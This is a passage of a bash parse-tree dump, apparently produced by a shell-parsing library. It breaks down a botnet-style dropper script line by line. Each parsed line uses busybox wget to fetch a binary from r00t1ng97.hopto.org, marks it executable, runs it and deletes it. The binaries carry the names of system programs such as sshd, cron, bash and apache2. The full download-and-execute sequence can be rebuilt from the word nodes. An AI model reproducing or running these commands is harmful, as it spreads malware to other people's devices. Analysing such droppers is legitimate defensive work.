    WordNode(lineno=19, pos=(1719, 1721), word='cd'),
    WordNode(lineno=19, pos=(1722, 1730), word='/var/run'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1731, 1733)),
  CommandNode(lineno=19, pos=(1734, 1741), parts=[
    WordNode(lineno=19, pos=(1734, 1736), word='cd'),
    WordNode(lineno=19, pos=(1737, 1741), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1742, 1744)),
  CommandNode(lineno=19, pos=(1745, 1753), parts=[
    WordNode(lineno=19, pos=(1745, 1747), word='cd'),
    WordNode(lineno=19, pos=(1748, 1753), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1754, 1756)),
  CommandNode(lineno=19, pos=(1757, 1761), parts=[
    WordNode(lineno=19, pos=(1757, 1759), word='cd'),
    WordNode(lineno=19, pos=(1760, 1761), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1761, 1762)),
  CommandNode(lineno=19, pos=(1763, 1807), parts=[
    WordNode(lineno=19, pos=(1763, 1770), word='busybox'),
    WordNode(lineno=19, pos=(1771, 1775), word='wget'),
    WordNode(lineno=19, pos=(1776, 1807), word='http://r00t1ng97.hopto.org/ntpd'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1807, 1808)),
  CommandNode(lineno=19, pos=(1809, 1830), parts=[
    WordNode(lineno=19, pos=(1809, 1816), word='busybox'),
    WordNode(lineno=19, pos=(1817, 1822), word='chmod'),
    WordNode(lineno=19, pos=(1823, 1825), word='+x'),
    WordNode(lineno=19, pos=(1826, 1830), word='ntpd'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1830, 1831)),
  CommandNode(lineno=19, pos=(1832, 1838), parts=[
    WordNode(lineno=19, pos=(1832, 1838), word='./ntpd'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1838, 1839)),
  CommandNode(lineno=19, pos=(1840, 1859), parts=[
    WordNode(lineno=19, pos=(1840, 1847), word='busybox'),
    WordNode(lineno=19, pos=(1848, 1850), word='rm'),
    WordNode(lineno=19, pos=(1851, 1854), word='-rf'),
    WordNode(lineno=19, pos=(1855, 1859), word='ntpd'),
  ]),
])
ListNode(lineno=20, pos=(1860, 2010), parts=[
  CommandNode(lineno=20, pos=(1860, 1867), parts=[
    WordNode(lineno=20, pos=(1860, 1862), word='cd'),
    WordNode(lineno=20, pos=(1863, 1867), word='/tmp'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(1868, 1870)),
  CommandNode(lineno=20, pos=(1871, 1882), parts=[
    WordNode(lineno=20, pos=(1871, 1873), word='cd'),
    WordNode(lineno=20, pos=(1874, 1882), word='/var/run'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(1883, 1885)),
  CommandNode(lineno=20, pos=(1886, 1893), parts=[
    WordNode(lineno=20, pos=(1886, 1888), word='cd'),
    WordNode(lineno=20, pos=(1889, 1893), word='/mnt'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(1894, 1896)),
  CommandNode(lineno=20, pos=(1897, 1905), parts=[
    WordNode(lineno=20, pos=(1897, 1899), word='cd'),
    WordNode(lineno=20, pos=(1900, 1905), word='/root'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(1906, 1908)),
  CommandNode(lineno=20, pos=(1909, 1913), parts=[
    WordNode(lineno=20, pos=(1909, 1911), word='cd'),
    WordNode(lineno=20, pos=(1912, 1913), word='/'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1913, 1914)),
  CommandNode(lineno=20, pos=(1915, 1959), parts=[
    WordNode(lineno=20, pos=(1915, 1922), word='busybox'),
    WordNode(lineno=20, pos=(1923, 1927), word='wget'),
    WordNode(lineno=20, pos=(1928, 1959), word='http://r00t1ng97.hopto.org/sshd'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1959, 1960)),
  CommandNode(lineno=20, pos=(1961, 1981), parts=[
    WordNode(lineno=20, pos=(1961, 1973), word='busyboxchmod'),
    WordNode(lineno=20, pos=(1974, 1976), word='+x'),
    WordNode(lineno=20, pos=(1977, 1981), word='sshd'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1981, 1982)),
  CommandNode(lineno=20, pos=(1983, 1989), parts=[
    WordNode(lineno=20, pos=(1983, 1989), word='./sshd'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1989, 1990)),
  CommandNode(lineno=20, pos=(1991, 2010), parts=[
    WordNode(lineno=20, pos=(1991, 1998), word='busybox'),
    WordNode(lineno=20, pos=(1999, 2001), word='rm'),
    WordNode(lineno=20, pos=(2002, 2005), word='-rf'),
    WordNode(lineno=20, pos=(2006, 2010), word='sshd'),
  ]),
])
ListNode(lineno=21, pos=(2011, 2174), parts=[
  CommandNode(lineno=21, pos=(2011, 2018), parts=[
    WordNode(lineno=21, pos=(2011, 2013), word='cd'),
    WordNode(lineno=21, pos=(2014, 2018), word='/tmp'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2019, 2021)),
  CommandNode(lineno=21, pos=(2022, 2033), parts=[
    WordNode(lineno=21, pos=(2022, 2024), word='cd'),
    WordNode(lineno=21, pos=(2025, 2033), word='/var/run'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2034, 2036)),
  CommandNode(lineno=21, pos=(2037, 2044), parts=[
    WordNode(lineno=21, pos=(2037, 2039), word='cd'),
    WordNode(lineno=21, pos=(2040, 2044), word='/mnt'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2045, 2047)),
  CommandNode(lineno=21, pos=(2048, 2056), parts=[
    WordNode(lineno=21, pos=(2048, 2050), word='cd'),
    WordNode(lineno=21, pos=(2051, 2056), word='/root'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2057, 2059)),
  CommandNode(lineno=21, pos=(2060, 2064), parts=[
    WordNode(lineno=21, pos=(2060, 2062), word='cd'),
    WordNode(lineno=21, pos=(2063, 2064), word='/'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2064, 2065)),
  CommandNode(lineno=21, pos=(2066, 2113), parts=[
    WordNode(lineno=21, pos=(2066, 2073), word='busybox'),
    WordNode(lineno=21, pos=(2074, 2078), word='wget'),
    WordNode(lineno=21, pos=(2079, 2113), word='http://r00t1ng97.hopto.org/openssh'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2113, 2114)),
  CommandNode(lineno=21, pos=(2115, 2139), parts=[
    WordNode(lineno=21, pos=(2115, 2122), word='busybox'),
    WordNode(lineno=21, pos=(2123, 2128), word='chmod'),
    WordNode(lineno=21, pos=(2129, 2131), word='+x'),
    WordNode(lineno=21, pos=(2132, 2139), word='openssh'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2139, 2140)),
  CommandNode(lineno=21, pos=(2141, 2150), parts=[
    WordNode(lineno=21, pos=(2141, 2150), word='./openssh'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2150, 2151)),
  CommandNode(lineno=21, pos=(2152, 2174), parts=[
    WordNode(lineno=21, pos=(2152, 2159), word='busybox'),
    WordNode(lineno=21, pos=(2160, 2162), word='rm'),
    WordNode(lineno=21, pos=(2163, 2166), word='-rf'),
    WordNode(lineno=21, pos=(2167, 2174), word='openssh'),
  ]),
])
ListNode(lineno=22, pos=(2175, 2326), parts=[
  CommandNode(lineno=22, pos=(2175, 2182), parts=[
    WordNode(lineno=22, pos=(2175, 2177), word='cd'),
    WordNode(lineno=22, pos=(2178, 2182), word='/tmp'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2183, 2185)),
  CommandNode(lineno=22, pos=(2186, 2197), parts=[
    WordNode(lineno=22, pos=(2186, 2188), word='cd'),
    WordNode(lineno=22, pos=(2189, 2197), word='/var/run'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2198, 2200)),
  CommandNode(lineno=22, pos=(2201, 2208), parts=[
    WordNode(lineno=22, pos=(2201, 2203), word='cd'),
    WordNode(lineno=22, pos=(2204, 2208), word='/mnt'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2209, 2211)),
  CommandNode(lineno=22, pos=(2212, 2220), parts=[
    WordNode(lineno=22, pos=(2212, 2214), word='cd'),
    WordNode(lineno=22, pos=(2215, 2220), word='/root'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2221, 2223)),
  CommandNode(lineno=22, pos=(2224, 2228), parts=[
    WordNode(lineno=22, pos=(2224, 2226), word='cd'),
    WordNode(lineno=22, pos=(2227, 2228), word='/'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2228, 2229)),
  CommandNode(lineno=22, pos=(2230, 2274), parts=[
    WordNode(lineno=22, pos=(2230, 2237), word='busybox'),
    WordNode(lineno=22, pos=(2238, 2242), word='wget'),
    WordNode(lineno=22, pos=(2243, 2274), word='http://r00t1ng97.hopto.org/bash'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2274, 2275)),
  CommandNode(lineno=22, pos=(2276, 2297), parts=[
    WordNode(lineno=22, pos=(2276, 2283), word='busybox'),
    WordNode(lineno=22, pos=(2284, 2289), word='chmod'),
    WordNode(lineno=22, pos=(2290, 2292), word='+x'),
    WordNode(lineno=22, pos=(2293, 2297), word='bash'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2297, 2298)),
  CommandNode(lineno=22, pos=(2299, 2305), parts=[
    WordNode(lineno=22, pos=(2299, 2305), word='./bash'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2305, 2306)),
  CommandNode(lineno=22, pos=(2307, 2326), parts=[
    WordNode(lineno=22, pos=(2307, 2314), word='busybox'),
    WordNode(lineno=22, pos=(2315, 2317), word='rm'),
    WordNode(lineno=22, pos=(2318, 2321), word='-rf'),
    WordNode(lineno=22, pos=(2322, 2326), word='bash'),
  ]),
])
ListNode(lineno=23, pos=(2327, 2478), parts=[
  CommandNode(lineno=23, pos=(2327, 2334), parts=[
    WordNode(lineno=23, pos=(2327, 2329), word='cd'),
    WordNode(lineno=23, pos=(2330, 2334), word='/tmp'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2335, 2337)),
  CommandNode(lineno=23, pos=(2338, 2349), parts=[
    WordNode(lineno=23, pos=(2338, 2340), word='cd'),
    WordNode(lineno=23, pos=(2341, 2349), word='/var/run'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2350, 2352)),
  CommandNode(lineno=23, pos=(2353, 2360), parts=[
    WordNode(lineno=23, pos=(2353, 2355), word='cd'),
    WordNode(lineno=23, pos=(2356, 2360), word='/mnt'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2361, 2363)),
  CommandNode(lineno=23, pos=(2364, 2372), parts=[
    WordNode(lineno=23, pos=(2364, 2366), word='cd'),
    WordNode(lineno=23, pos=(2367, 2372), word='/root'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2373, 2375)),
  CommandNode(lineno=23, pos=(2376, 2380), parts=[
    WordNode(lineno=23, pos=(2376, 2378), word='cd'),
    WordNode(lineno=23, pos=(2379, 2380), word='/'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2380, 2381)),
  CommandNode(lineno=23, pos=(2382, 2426), parts=[
    WordNode(lineno=23, pos=(2382, 2389), word='busybox'),
    WordNode(lineno=23, pos=(2390, 2394), word='wget'),
    WordNode(lineno=23, pos=(2395, 2426), word='http://r00t1ng97.hopto.org/tftp'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2426, 2427)),
  CommandNode(lineno=23, pos=(2428, 2449), parts=[
    WordNode(lineno=23, pos=(2428, 2435), word='busybox'),
    WordNode(lineno=23, pos=(2436, 2441), word='chmod'),
    WordNode(lineno=23, pos=(2442, 2444), word='+x'),
    WordNode(lineno=23, pos=(2445, 2449), word='tftp'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2449, 2450)),
  CommandNode(lineno=23, pos=(2451, 2457), parts=[
    WordNode(lineno=23, pos=(2451, 2457), word='./tftp'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2457, 2458)),
  CommandNode(lineno=23, pos=(2459, 2478), parts=[
    WordNode(lineno=23, pos=(2459, 2466), word='busybox'),
    WordNode(lineno=23, pos=(2467, 2469), word='rm'),
    WordNode(lineno=23, pos=(2470, 2473), word='-rf'),
    WordNode(lineno=23, pos=(2474, 2478), word='tftp'),
  ]),
])
ListNode(lineno=24, pos=(2479, 2630), parts=[
  CommandNode(lineno=24, pos=(2479, 2486), parts=[
    WordNode(lineno=24, pos=(2479, 2481), word='cd'),
    WordNode(lineno=24, pos=(2482, 2486), word='/tmp'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(2487, 2489)),
  CommandNode(lineno=24, pos=(2490, 2501), parts=[
    WordNode(lineno=24, pos=(2490, 2492), word='cd'),
    WordNode(lineno=24, pos=(2493, 2501), word='/var/run'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(2502, 2504)),
  CommandNode(lineno=24, pos=(2505, 2512), parts=[
    WordNode(lineno=24, pos=(2505, 2507), word='cd'),
    WordNode(lineno=24, pos=(2508, 2512), word='/mnt'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(2513, 2515)),
  CommandNode(lineno=24, pos=(2516, 2524), parts=[
    WordNode(lineno=24, pos=(2516, 2518), word='cd'),
    WordNode(lineno=24, pos=(2519, 2524), word='/root'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(2525, 2527)),
  CommandNode(lineno=24, pos=(2528, 2532), parts=[
    WordNode(lineno=24, pos=(2528, 2530), word='cd'),
    WordNode(lineno=24, pos=(2531, 2532), word='/'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2532, 2533)),
  CommandNode(lineno=24, pos=(2534, 2578), parts=[
    WordNode(lineno=24, pos=(2534, 2541), word='busybox'),
    WordNode(lineno=24, pos=(2542, 2546), word='wget'),
    WordNode(lineno=24, pos=(2547, 2578), word='http://r00t1ng97.hopto.org/wget'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2578, 2579)),
  CommandNode(lineno=24, pos=(2580, 2601), parts=[
    WordNode(lineno=24, pos=(2580, 2587), word='busybox'),
    WordNode(lineno=24, pos=(2588, 2593), word='chmod'),
    WordNode(lineno=24, pos=(2594, 2596), word='+x'),
    WordNode(lineno=24, pos=(2597, 2601), word='wget'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2601, 2602)),
  CommandNode(lineno=24, pos=(2603, 2609), parts=[
    WordNode(lineno=24, pos=(2603, 2609), word='./wget'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2609, 2610)),
  CommandNode(lineno=24, pos=(2611, 2630), parts=[
    WordNode(lineno=24, pos=(2611, 2618), word='busybox'),
    WordNode(lineno=24, pos=(2619, 2621), word='rm'),
    WordNode(lineno=24, pos=(2622, 2625), word='-rf'),
    WordNode(lineno=24, pos=(2626, 2630), word='wget'),
  ]),
])
ListNode(lineno=25, pos=(2631, 2782), parts=[
  CommandNode(lineno=25, pos=(2631, 2638), parts=[
    WordNode(lineno=25, pos=(2631, 2633), word='cd'),
    WordNode(lineno=25, pos=(2634, 2638), word='/tmp'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(2639, 2641)),
  CommandNode(lineno=25, pos=(2642, 2653), parts=[
    WordNode(lineno=25, pos=(2642, 2644), word='cd'),
    WordNode(lineno=25, pos=(2645, 2653), word='/var/run'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(2654, 2656)),
  CommandNode(lineno=25, pos=(2657, 2664), parts=[
    WordNode(lineno=25, pos=(2657, 2659), word='cd'),
    WordNode(lineno=25, pos=(2660, 2664), word='/mnt'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(2665, 2667)),
  CommandNode(lineno=25, pos=(2668, 2676), parts=[
    WordNode(lineno=25, pos=(2668, 2670), word='cd'),
    WordNode(lineno=25, pos=(2671, 2676), word='/root'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(2677, 2679)),
  CommandNode(lineno=25, pos=(2680, 2684), parts=[
    WordNode(lineno=25, pos=(2680, 2682), word='cd'),
    WordNode(lineno=25, pos=(2683, 2684), word='/'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2684, 2685)),
  CommandNode(lineno=25, pos=(2686, 2730), parts=[
    WordNode(lineno=25, pos=(2686, 2693), word='busybox'),
    WordNode(lineno=25, pos=(2694, 2698), word='wget'),
    WordNode(lineno=25, pos=(2699, 2730), word='http://r00t1ng97.hopto.org/cron'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2730, 2731)),
  CommandNode(lineno=25, pos=(2732, 2753), parts=[
    WordNode(lineno=25, pos=(2732, 2739), word='busybox'),
    WordNode(lineno=25, pos=(2740, 2745), word='chmod'),
    WordNode(lineno=25, pos=(2746, 2748), word='+x'),
    WordNode(lineno=25, pos=(2749, 2753), word='cron'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2753, 2754)),
  CommandNode(lineno=25, pos=(2755, 2761), parts=[
    WordNode(lineno=25, pos=(2755, 2761), word='./cron'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2761, 2762)),
  CommandNode(lineno=25, pos=(2763, 2782), parts=[
    WordNode(lineno=25, pos=(2763, 2770), word='busybox'),
    WordNode(lineno=25, pos=(2771, 2773), word='rm'),
    WordNode(lineno=25, pos=(2774, 2777), word='-rf'),
    WordNode(lineno=25, pos=(2778, 2782), word='cron'),
  ]),
])
ListNode(lineno=26, pos=(2783, 2930), parts=[
  CommandNode(lineno=26, pos=(2783, 2790), parts=[
    WordNode(lineno=26, pos=(2783, 2785), word='cd'),
    WordNode(lineno=26, pos=(2786, 2790), word='/tmp'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(2791, 2793)),
  CommandNode(lineno=26, pos=(2794, 2805), parts=[
    WordNode(lineno=26, pos=(2794, 2796), word='cd'),
    WordNode(lineno=26, pos=(2797, 2805), word='/var/run'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(2806, 2808)),
  CommandNode(lineno=26, pos=(2809, 2816), parts=[
    WordNode(lineno=26, pos=(2809, 2811), word='cd'),
    WordNode(lineno=26, pos=(2812, 2816), word='/mnt'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(2817, 2819)),
  CommandNode(lineno=26, pos=(2820, 2828), parts=[
    WordNode(lineno=26, pos=(2820, 2822), word='cd'),
    WordNode(lineno=26, pos=(2823, 2828), word='/root'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(2829, 2831)),
  CommandNode(lineno=26, pos=(2832, 2836), parts=[
    WordNode(lineno=26, pos=(2832, 2834), word='cd'),
    WordNode(lineno=26, pos=(2835, 2836), word='/'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2836, 2837)),
  CommandNode(lineno=26, pos=(2838, 2881), parts=[
    WordNode(lineno=26, pos=(2838, 2845), word='busybox'),
    WordNode(lineno=26, pos=(2846, 2850), word='wget'),
    WordNode(lineno=26, pos=(2851, 2881), word='http://r00t1ng97.hopto.org/ftp'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2881, 2882)),
  CommandNode(lineno=26, pos=(2883, 2903), parts=[
    WordNode(lineno=26, pos=(2883, 2890), word='busybox'),
    WordNode(lineno=26, pos=(2891, 2896), word='chmod'),
    WordNode(lineno=26, pos=(2897, 2899), word='+x'),
    WordNode(lineno=26, pos=(2900, 2903), word='ftp'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2903, 2904)),
  CommandNode(lineno=26, pos=(2905, 2910), parts=[
    WordNode(lineno=26, pos=(2905, 2910), word='./ftp'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2910, 2911)),
  CommandNode(lineno=26, pos=(2912, 2930), parts=[
    WordNode(lineno=26, pos=(2912, 2919), word='busybox'),
    WordNode(lineno=26, pos=(2920, 2922), word='rm'),
    WordNode(lineno=26, pos=(2923, 2926), word='-rf'),
    WordNode(lineno=26, pos=(2927, 2930), word='ftp'),
  ]),
])
ListNode(lineno=27, pos=(2931, 3082), parts=[
  CommandNode(lineno=27, pos=(2931, 2938), parts=[
    WordNode(lineno=27, pos=(2931, 2933), word='cd'),
    WordNode(lineno=27, pos=(2934, 2938), word='/tmp'),
  ]),
  OperatorNode(lineno=27, op='||', pos=(2939, 2941)),
  CommandNode(lineno=27, pos=(2942, 2953), parts=[
    WordNode(lineno=27, pos=(2942, 2944), word='cd'),
    WordNode(lineno=27, pos=(2945, 2953), word='/var/run'),
  ]),
  OperatorNode(lineno=27, op='||', pos=(2954, 2956)),
  CommandNode(lineno=27, pos=(2957, 2964), parts=[
    WordNode(lineno=27, pos=(2957, 2959), word='cd'),
    WordNode(lineno=27, pos=(2960, 2964), word='/mnt'),
  ]),
  OperatorNode(lineno=27, op='||', pos=(2965, 2967)),
  CommandNode(lineno=27, pos=(2968, 2976), parts=[
    WordNode(lineno=27, pos=(2968, 2970), word='cd'),
    WordNode(lineno=27, pos=(2971, 2976), word='/root'),
  ]),
  OperatorNode(lineno=27, op='||', pos=(2977, 2979)),
  CommandNode(lineno=27, pos=(2980, 2984), parts=[
    WordNode(lineno=27, pos=(2980, 2982), word='cd'),
    WordNode(lineno=27, pos=(2983, 2984), word='/'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(2984, 2985)),
  CommandNode(lineno=27, pos=(2986, 3030), parts=[
    WordNode(lineno=27, pos=(2986, 2993), word='busybox'),
    WordNode(lineno=27, pos=(2994, 2998), word='wget'),
    WordNode(lineno=27, pos=(2999, 3030), word='http://r00t1ng97.hopto.org/pftp'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(3030, 3031)),
  CommandNode(lineno=27, pos=(3032, 3053), parts=[
    WordNode(lineno=27, pos=(3032, 3039), word='busybox'),
    WordNode(lineno=27, pos=(3040, 3045), word='chmod'),
    WordNode(lineno=27, pos=(3046, 3048), word='+x'),
    WordNode(lineno=27, pos=(3049, 3053), word='pftp'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(3053, 3054)),
  CommandNode(lineno=27, pos=(3055, 3061), parts=[
    WordNode(lineno=27, pos=(3055, 3061), word='./pftp'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(3061, 3062)),
  CommandNode(lineno=27, pos=(3063, 3082), parts=[
    WordNode(lineno=27, pos=(3063, 3070), word='busybox'),
    WordNode(lineno=27, pos=(3071, 3073), word='rm'),
    WordNode(lineno=27, pos=(3074, 3077), word='-rf'),
    WordNode(lineno=27, pos=(3078, 3082), word='pftp'),
  ]),
])
ListNode(lineno=28, pos=(3083, 3226), parts=[
  CommandNode(lineno=28, pos=(3083, 3090), parts=[
    WordNode(lineno=28, pos=(3083, 3085), word='cd'),
    WordNode(lineno=28, pos=(3086, 3090), word='/tmp'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3091, 3093)),
  CommandNode(lineno=28, pos=(3094, 3105), parts=[
    WordNode(lineno=28, pos=(3094, 3096), word='cd'),
    WordNode(lineno=28, pos=(3097, 3105), word='/var/run'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3106, 3108)),
  CommandNode(lineno=28, pos=(3109, 3116), parts=[
    WordNode(lineno=28, pos=(3109, 3111), word='cd'),
    WordNode(lineno=28, pos=(3112, 3116), word='/mnt'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3117, 3119)),
  CommandNode(lineno=28, pos=(3120, 3128), parts=[
    WordNode(lineno=28, pos=(3120, 3122), word='cd'),
    WordNode(lineno=28, pos=(3123, 3128), word='/root'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3129, 3131)),
  CommandNode(lineno=28, pos=(3132, 3136), parts=[
    WordNode(lineno=28, pos=(3132, 3134), word='cd'),
    WordNode(lineno=28, pos=(3135, 3136), word='/'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3136, 3137)),
  CommandNode(lineno=28, pos=(3138, 3180), parts=[
    WordNode(lineno=28, pos=(3138, 3145), word='busybox'),
    WordNode(lineno=28, pos=(3146, 3150), word='wget'),
    WordNode(lineno=28, pos=(3151, 3180), word='http://r00t1ng97.hopto.org/sh'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3180, 3181)),
  CommandNode(lineno=28, pos=(3182, 3201), parts=[
    WordNode(lineno=28, pos=(3182, 3189), word='busybox'),
    WordNode(lineno=28, pos=(3190, 3195), word='chmod'),
    WordNode(lineno=28, pos=(3196, 3198), word='+x'),
    WordNode(lineno=28, pos=(3199, 3201), word='sh'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3201, 3202)),
  CommandNode(lineno=28, pos=(3203, 3207), parts=[
    WordNode(lineno=28, pos=(3203, 3207), word='./sh'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3207, 3208)),
  CommandNode(lineno=28, pos=(3209, 3226), parts=[
    WordNode(lineno=28, pos=(3209, 3216), word='busybox'),
    WordNode(lineno=28, pos=(3217, 3219), word='rm'),
    WordNode(lineno=28, pos=(3220, 3223), word='-rf'),
    WordNode(lineno=28, pos=(3224, 3226), word='sh'),
  ]),
])
ListNode(lineno=29, pos=(3227, 3382), parts=[
  CommandNode(lineno=29, pos=(3227, 3234), parts=[
    WordNode(lineno=29, pos=(3227, 3229), word='cd'),
    WordNode(lineno=29, pos=(3230, 3234), word='/tmp'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3235, 3237)),
  CommandNode(lineno=29, pos=(3238, 3249), parts=[
    WordNode(lineno=29, pos=(3238, 3240), word='cd'),
    WordNode(lineno=29, pos=(3241, 3249), word='/var/run'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3250, 3252)),
  CommandNode(lineno=29, pos=(3253, 3260), parts=[
    WordNode(lineno=29, pos=(3253, 3255), word='cd'),
    WordNode(lineno=29, pos=(3256, 3260), word='/mnt'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3261, 3263)),
  CommandNode(lineno=29, pos=(3264, 3272), parts=[
    WordNode(lineno=29, pos=(3264, 3266), word='cd'),
    WordNode(lineno=29, pos=(3267, 3272), word='/root'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3273, 3275)),
  CommandNode(lineno=29, pos=(3276, 3280), parts=[
    WordNode(lineno=29, pos=(3276, 3278), word='cd'),
    WordNode(lineno=29, pos=(3279, 3280), word='/'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3280, 3281)),
  CommandNode(lineno=29, pos=(3282, 3327), parts=[
    WordNode(lineno=29, pos=(3282, 3289), word='busybox'),
    WordNode(lineno=29, pos=(3290, 3294), word='wget'),
    WordNode(lineno=29, pos=(3295, 3327), word='http://r00t1ng97.hopto.org/[cpu]'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3327, 3328)),
  CommandNode(lineno=29, pos=(3329, 3351), parts=[
    WordNode(lineno=29, pos=(3329, 3336), word='busybox'),
    WordNode(lineno=29, pos=(3337, 3342), word='chmod'),
    WordNode(lineno=29, pos=(3343, 3345), word='+x'),
    WordNode(lineno=29, pos=(3346, 3351), word='[cpu]'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3351, 3352)),
  CommandNode(lineno=29, pos=(3353, 3360), parts=[
    WordNode(lineno=29, pos=(3353, 3360), word='./[cpu]'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3360, 3361)),
  CommandNode(lineno=29, pos=(3362, 3382), parts=[
    WordNode(lineno=29, pos=(3362, 3369), word='busybox'),
    WordNode(lineno=29, pos=(3370, 3372), word='rm'),
    WordNode(lineno=29, pos=(3373, 3376), word='-rf'),
    WordNode(lineno=29, pos=(3377, 3382), word='[cpu]'),
  ]),
])
ListNode(lineno=30, pos=(3383, 3546), parts=[
  CommandNode(lineno=30, pos=(3383, 3390), parts=[
    WordNode(lineno=30, pos=(3383, 3385), word='cd'),
    WordNode(lineno=30, pos=(3386, 3390), word='/tmp'),
  ]),
  OperatorNode(lineno=30, op='||', pos=(3391, 3393)),
  CommandNode(lineno=30, pos=(3394, 3405), parts=[
    WordNode(lineno=30, pos=(3394, 3396), word='cd'),
    WordNode(lineno=30, pos=(3397, 3405), word='/var/run'),
  ]),
  OperatorNode(lineno=30, op='||', pos=(3406, 3408)),
  CommandNode(lineno=30, pos=(3409, 3416), parts=[
    WordNode(lineno=30, pos=(3409, 3411), word='cd'),
    WordNode(lineno=30, pos=(3412, 3416), word='/mnt'),
  ]),
  OperatorNode(lineno=30, op='||', pos=(3417, 3419)),
  CommandNode(lineno=30, pos=(3420, 3428), parts=[
    WordNode(lineno=30, pos=(3420, 3422), word='cd'),
    WordNode(lineno=30, pos=(3423, 3428), word='/root'),
  ]),
  OperatorNode(lineno=30, op='||', pos=(3429, 3431)),
  CommandNode(lineno=30, pos=(3432, 3436), parts=[
    WordNode(lineno=30, pos=(3432, 3434), word='cd'),
    WordNode(lineno=30, pos=(3435, 3436), word='/'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(3436, 3437)),
  CommandNode(lineno=30, pos=(3438, 3485), parts=[
    WordNode(lineno=30, pos=(3438, 3445), word='busybox'),
    WordNode(lineno=30, pos=(3446, 3450), word='wget'),
    WordNode(lineno=30, pos=(3451, 3485), word='http://r00t1ng97.hopto.org/apache2'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(3485, 3486)),
  CommandNode(lineno=30, pos=(3487, 3511), parts=[
    WordNode(lineno=30, pos=(3487, 3494), word='busybox'),
    WordNode(lineno=30, pos=(3495, 3500), word='chmod'),
    WordNode(lineno=30, pos=(3501, 3503), word='+x'),
    WordNode(lineno=30, pos=(3504, 3511), word='apache2'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(3511, 3512)),
  CommandNode(lineno=30, pos=(3513, 3522), parts=[
    WordNode(lineno=30, pos=(3513, 3522), word='./apache2'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(3522, 3523)),
  CommandNode(lineno=30, pos=(3524, 3546), parts=[
    WordNode(lineno=30, pos=(3524, 3531), word='busybox'),
